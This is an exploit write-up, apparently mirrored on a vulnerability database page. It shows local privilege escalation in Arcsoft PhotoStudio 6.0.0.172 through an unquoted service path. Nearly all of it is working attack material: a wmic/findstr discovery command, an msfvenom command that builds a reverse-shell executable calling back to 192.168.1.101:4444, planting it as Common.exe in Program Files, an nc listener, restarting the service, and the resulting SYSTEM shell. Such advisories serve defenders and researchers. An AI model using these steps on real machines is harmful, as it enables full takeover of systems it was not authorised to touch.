Vulners
Lucene search
Arcsoft PhotoStudio 6.0.0.172 - Unquoted Service Path
##########################################################################
# #
# Exploit Title: Arcsoft PhotoStudio 6.0.0.172 - Unquoted Service Path #
# Date: 2023/04/22 #
# Exploit Author: msd0pe #
# Vendor Homepage: https://www.arcsoft.com/ #
# My Github: https://github.com/msd0pe-1 #
# #
##########################################################################
Arcsoft PhotoStudio:
Versions =< 6.0.0.172 contains an unquoted service path which allows attackers to escalate privileges to the system level.
[1] Find the unquoted service path:
> wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
ArcSoft Exchange Service ADExchange C:\Program Files (x86)\Common Files\ArcSoft\esinter\Bin\eservutil.exe Auto
[2] Get informations about the service:
> sc qc "ADExchange"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: ADExchange
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files (x86)\Common Files\ArcSoft\esinter\Bin\eservutil.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : ArcSoft Exchange Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
[3] Generate a reverse shell:
> msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o Common.exe
[4] Upload the reverse shell to C:\Program Files (x86)\Common.exe
> put Commom.exe
> ls
drw-rw-rw- 0 Sun Apr 23 04:10:25 2023 .
drw-rw-rw- 0 Sun Apr 23 04:10:25 2023 ..
drw-rw-rw- 0 Sun Apr 23 03:55:37 2023 ArcSoft
drw-rw-rw- 0 Sun Apr 23 03:55:36 2023 Common Files
-rw-rw-rw- 7168 Sun Apr 23 04:10:25 2023 Common.exe
-rw-rw-rw- 174 Sun Jul 24 08:12:38 2022 desktop.ini
drw-rw-rw- 0 Sun Apr 23 03:55:36 2023 InstallShield Installation Information
drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Internet Explorer
drw-rw-rw- 0 Sun Jul 24 07:27:06 2022 Microsoft
drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Microsoft.NET
drw-rw-rw- 0 Sat Apr 22 05:48:20 2023 Windows Defender
drw-rw-rw- 0 Sat Apr 22 05:46:44 2023 Windows Mail
drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Windows Media Player
drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Multimedia Platform
drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows NT
drw-rw-rw- 0 Fri Oct 28 05:25:41 2022 Windows Photo Viewer
drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Portable Devices
drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Sidebar
drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 WindowsPowerShell
[5] Start listener
> nc -lvp 4444
[6] Reboot the service/server
> sc stop "ADExchange"
> sc start "ADExchange"
OR
> shutdown /r
[7] Enjoy !
192.168.1.102: inverse host lookup failed: Unknown host
connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309
Microsoft Windows [Version 10.0.19045.2130]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\systemData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 Apr 2023 00:00Current
7.4High risk
Vulners AI Score7.4